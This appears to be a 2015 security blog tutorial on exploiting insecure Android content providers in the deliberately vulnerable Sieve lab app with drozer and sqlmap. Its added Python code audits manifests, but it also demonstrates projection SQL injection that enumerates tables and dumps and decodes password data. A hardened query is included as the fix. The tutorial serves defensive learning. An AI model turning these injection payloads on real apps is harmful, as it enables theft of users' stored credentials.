
Monday, 27 July 2015

Android Hacking - Insecure Content Providers

Content Providers

In this post we will look at an example of an insecure content provider in the Sieve application. Content providers are the Android interface for sharing structured data between applications. Each content provider is addressed by a URI that begins with content://

Any application that knows the URI can call insert(), query(), update() or delete() on the data the provider exposes. If the provider is exported without suitable read/write permissions in AndroidManifest.xml, every other app on the device can reach it, which can lead to sensitive data leakage.

Analyzing Insecure Content Providers

As we have seen in the previous post, the Sieve application has two content providers exported.


We can run the app.provider.info -a command against the Sieve package to retrieve further information. The output reveals that the two exported content providers, DBContentProvider and FileBackupProvider, have no read or write permission set at the provider level. It does, however, show a path-permission on DBContentProvider/Keys: only the /Keys path requires a permission to read or write, and every other path on that provider is open to any caller.
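To see what app.provider.info is reading, here is an added example (my code, not drozer's and not Sieve's) that audits an AndroidManifest.xml for exported providers that carry no permission, and lists any path-permission that guards only part of a provider. The sample manifest is constructed to mirror the Sieve findings above; its package name, permission names and the third provider are invented.

```python
"""Audit AndroidManifest.xml for exported content providers without permissions.

Added example: this is my code, not drozer's and not Sieve's. It reports from
the manifest what app.provider.info reports from a device: which providers are
exported, what read/write permission guards each one, and any path-permission
that protects only part of a provider. The sample manifest is constructed to
mirror the Sieve findings described in the post; its package and permission
names are invented.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample manifest: two exported providers with no provider-level
# permission, one of which guards only its /Keys path.
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.sieve">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="16"/>
  <application android:label="Sieve">
    <provider android:name=".DBContentProvider"
        android:authorities="com.example.sieve.DBContentProvider"
        android:exported="true">
      <path-permission android:path="/Keys"
          android:readPermission="com.example.sieve.READ_KEYS"
          android:writePermission="com.example.sieve.WRITE_KEYS"/>
    </provider>
    <provider android:name=".FileBackupProvider"
        android:authorities="com.example.sieve.FileBackupProvider"
        android:exported="true"/>
    <provider android:name=".InternalProvider"
        android:authorities="com.example.sieve.InternalProvider"
        android:exported="false"/>
  </application>
</manifest>
"""


def attr(elem, name, default=None):
    """Read an android:-namespaced attribute."""
    return elem.get("{%s}%s" % (ANDROID_NS, name), default)


def is_exported(provider, min_sdk, target_sdk):
    """Apply the platform default: with no android:exported attribute a provider
    is exported when minSdkVersion or targetSdkVersion is 16 or lower."""
    value = attr(provider, "exported")
    if value is None:
        return min_sdk <= 16 or target_sdk <= 16
    return value.lower() == "true"


def audit_manifest(xml_text):
    """Return one finding per exported provider."""
    root = ET.fromstring(xml_text)
    uses_sdk = root.find("uses-sdk")
    min_sdk = int(attr(uses_sdk, "minSdkVersion", "1")) if uses_sdk is not None else 1
    target_sdk = int(attr(uses_sdk, "targetSdkVersion", str(min_sdk))) if uses_sdk is not None else min_sdk
    findings = []
    for prov in root.iter("provider"):
        if not is_exported(prov, min_sdk, target_sdk):
            continue
        # android:permission is the fallback for both directions.
        read = attr(prov, "readPermission") or attr(prov, "permission")
        write = attr(prov, "writePermission") or attr(prov, "permission")
        paths = []
        for pp in prov.findall("path-permission"):
            path = attr(pp, "path") or attr(pp, "pathPrefix") or attr(pp, "pathPattern")
            paths.append((path,
                          attr(pp, "readPermission") or attr(pp, "permission"),
                          attr(pp, "writePermission") or attr(pp, "permission")))
        findings.append({
            "name": attr(prov, "name"),
            "authority": attr(prov, "authorities"),
            "read_permission": read,
            "write_permission": write,
            "path_permissions": paths,
            # Reachable by every app on the device, except on the listed paths.
            "unprotected": read is None and write is None,
        })
    return findings


if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        state = "UNPROTECTED" if f["unprotected"] else "protected"
        print("%s (%s): %s, read=%s write=%s" % (
            f["name"], f["authority"], state, f["read_permission"], f["write_permission"]))
        for path, r, w in f["path_permissions"]:
            print("  path-permission %s: read=%s write=%s" % (path, r, w))
```

The check also applies the exported-by-default rule for apps whose minSdkVersion or targetSdkVersion is 16 or lower, which is why older apps like Sieve expose providers even when the manifest never says android:exported="true".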


Another way of discovering content:// URIs is the scanner.provider.finduris module, which searches the application for content:// strings and tries to query each one. This can reveal further sensitive paths; in the screenshot below you can see a /Passwords path.


If we query that path with app.provider.query, it returns the Passwords table, including service names, usernames and base64-encoded passwords.


This is a good example of how unprotected content providers can reveal sensitive information.


SQL Injection Issues 

Another insecurity associated with content providers is SQL injection. Content providers are commonly backed by SQLite databases, and the projection and selection arguments a caller passes to query() are often concatenated straight into the SQL statement. If they are not validated, a caller can inject SQL to read data the provider was never meant to return.

There are a number of ways of identifying and exploiting SQLi with Drozer. You can inject SQL manually through the --projection and --selection arguments of app.provider.query, or let the scanner.provider.injection module test every queryable provider for you.

It is also possible to use existing tools in conjunction with Drozer modules. In the example below we use auxiliary.webcontentresolver, which exposes every installed content provider through a local web service. Any HTTP-based tool, in this case sqlmap, can then be pointed at the provider.


Drozer and SQLmap

The first thing to do is start the module on a chosen port.


Next, navigate to http://localhost:1234 in your browser. You should see a list of the content providers on the device.


If you select the DBContentProvider/Passwords URI, you can manipulate the parameters that the web interface passes through to the provider. The example below shows an SQL error being returned after injecting a single quote into the projection parameter, which is the usual sign that the input reaches the query unsanitised.

We can now run sqlmap against that URL. The command below tells sqlmap to attack the projection parameter and enumerate the tables.




The results show three tables returned from sqlite_master.


Finally, we can dump the contents of the Passwords table.
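What sqlmap automates here is the same projection injection you can type into app.provider.query by hand. The following is an added example (my code, not from the post, drozer, sqlmap or Sieve) that re-creates the query shape a vulnerable provider builds with Python's sqlite3 and walks the same steps: the quote probe, enumerating tables from sqlite_master, dumping a table the exposed path never returns, and decoding the base64 password column. It closes with one possible hardened query(), which is my fix rather than Sieve's. The schema, rows and values are constructed sample data.

```python
"""Projection injection through a SQLite-backed content provider.

Added example; it is not code from the original post, from drozer, sqlmap or
Sieve. It reproduces, with Python's sqlite3, the query shape a vulnerable
provider builds (SELECT <projection> FROM <table> WHERE <selection>) and runs
the same steps the post performs with app.provider.query and sqlmap. The
schema, rows and values are constructed sample data, and hardened_query is one
possible fix, not Sieve's.
"""
import base64
import re
import sqlite3

TABLE = "Passwords"
ALLOWED_COLUMNS = ("_id", "service", "username", "password", "email")


def build_database():
    """Constructed stand-in for the app's database. android_metadata is the
    table Android's SQLiteDatabase adds to every database it creates."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE android_metadata (locale TEXT)")
    db.execute("CREATE TABLE Key (Password TEXT, pin TEXT)")
    db.execute("CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,"
               " username TEXT, password TEXT, email TEXT)")
    db.execute("INSERT INTO Key VALUES (?, ?)", ("sample-master-password", "1234"))
    for service, user, secret, mail in (
        ("Gmail", "alice", b"s3cret-one", "alice@example.com"),
        ("Bank", "bob", b"s3cret-two", "bob@example.com"),
    ):
        db.execute("INSERT INTO Passwords (service, username, password, email)"
                   " VALUES (?, ?, ?, ?)",
                   (service, user, base64.b64encode(secret).decode(), mail))
    db.commit()
    return db


def vulnerable_query(db, projection, selection=None, selection_args=()):
    """Mirrors a provider whose query() passes the caller's projection and
    selection straight to SQLiteQueryBuilder: both become SQL text."""
    sql = "SELECT %s FROM %s" % (", ".join(projection), TABLE)
    if selection:
        sql += " WHERE " + selection
    return db.execute(sql, selection_args).fetchall()


def probe_projection(db):
    """The quote test from the web interface: a lone quote in the projection
    is an SQL error on the vulnerable provider, which is the injection signal."""
    try:
        vulnerable_query(db, ["'"])
    except sqlite3.OperationalError:
        return True
    return False


def enumerate_tables(db):
    """What sqlmap --tables does here: the projection selects from
    sqlite_master and comments out the provider's own FROM clause."""
    rows = vulnerable_query(db, ["name FROM sqlite_master WHERE type='table'--"])
    return sorted(name for (name,) in rows)


def dump_table(db, table):
    """Dump any table by name through the same projection injection."""
    return vulnerable_query(db, ["* FROM %s--" % table])


def decode_passwords(rows):
    """Passwords rows as (service, username, cleartext) after base64 decoding."""
    return [(svc, user, base64.b64decode(pw).decode())
            for _id, svc, user, pw, _mail in rows]


_SAFE_SELECTION = re.compile(r"^(\w+)\s*=\s*\?$")


def hardened_query(db, projection, selection=None, selection_args=()):
    """One way to close the hole: accept only known column names in the
    projection (what SQLiteQueryBuilder.setProjectionMap with setStrict(true)
    enforces on Android) and only a parameterised 'column = ?' selection."""
    if not projection:
        projection = list(ALLOWED_COLUMNS)
    for col in projection:
        if col not in ALLOWED_COLUMNS:
            raise ValueError("rejected projection column: %r" % (col,))
    sql = "SELECT %s FROM %s" % (", ".join(projection), TABLE)
    if selection:
        m = _SAFE_SELECTION.match(selection)
        if not m or m.group(1) not in ALLOWED_COLUMNS or len(selection_args) != 1:
            raise ValueError("rejected selection: %r" % (selection,))
        sql += " WHERE " + selection
    return db.execute(sql, selection_args).fetchall()


def hardened_rejects(db, projection, selection=None, selection_args=()):
    """True when the hardened provider refuses the request."""
    try:
        hardened_query(db, projection, selection, selection_args)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = build_database()
    print("injectable:", probe_projection(db))
    print("tables:", enumerate_tables(db))
    print("Key table:", dump_table(db, "Key"))
    print("Passwords:", decode_passwords(dump_table(db, "Passwords")))
    print("hardened rejects sqlite_master read:",
          hardened_rejects(db, ["name FROM sqlite_master WHERE type='table'--"]))
```

The payloads are the ones drozer and sqlmap send, minus the trailing semicolon: since the provider appends its own FROM clause after the caller's text, the `--` comment is what discards it. The hardened variant is deliberately strict; on Android the equivalent is a fixed projection map plus setStrict(true) on the query builder, and, as the manifest section shows, a permission on the provider so that only intended callers get this far.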


References:
https://labs.mwrinfosecurity.com/tools/webcontentresolver/
http://sqlmap.org/
http://blog.mdsec.co.uk/2015/02/the-mobile-application-hackers-handbook.html
